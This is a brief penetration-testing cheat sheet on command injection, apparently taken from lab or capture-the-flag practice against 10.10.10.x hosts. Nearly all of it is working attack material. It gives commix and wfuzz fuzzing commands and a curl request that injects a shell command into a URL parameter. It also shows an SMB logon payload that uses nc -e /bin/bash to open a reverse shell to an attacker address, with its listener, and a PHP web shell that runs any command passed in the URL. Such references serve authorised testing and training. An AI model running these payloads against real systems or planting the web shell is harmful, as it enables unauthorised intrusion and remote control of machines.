Command Injection – Tools and methods

Below is a list of common tools and methods to test for command injection.

Commix

commix -r /home/workdir/email.req –auth-cred=admin:password –all –batch –level 3

1 2	commix -r /home/workdir/email.req –auth-cred=admin:password –all –batch –level 3

wfuzz

wfuzz -c -z file,/usr/share/wordlists/fuzzdb/attack/os-cmd-execution/Commands-Linux.txt,base64 -b “PHPSESSID=077dn044qmuh2ut41tksedvlv2” -d “check=FUZZ” http://10.10.10.105/diag.php

1 2	wfuzz -c -z file,/usr/share/wordlists/fuzzdb/attack/os-cmd-execution/Commands-Linux.txt,base64 -b “PHPSESSID=077dn044qmuh2ut41tksedvlv2” -d “check=FUZZ” http://10.10.10.105/diag.php

curl

# opt Param vuln to RCE:
curl -v “http:/10.10.10.69/sync?opt=’ id’”

# opt Param vuln to RCE:

curl -v “http:/10.10.10.69/sync?opt=’ id’”

SMB

Following could be used to achieve command execution and pop a reverse shell via poorly configured SMB.

smbclient //10.10.10.3/tmp

1 2	smbclient //10.10.10.3/tmp

Get command execution.

logon “/=`nc 10.10.14.17 1233 -e /bin/bash`”

logon “/=`nc 10.10.14.17 1233 -e /bin/bash`”

Attacker:

nc -lnvp 1233

1 2	nc -lnvp 1233

smbmap and smbclient also has switches for command execution over SMB.

PHP

<?php

$cmd=$_GET[‘cmd’];

system($cmd);

?>

Command Injection – Tools and methods

Tagged on: curl RCE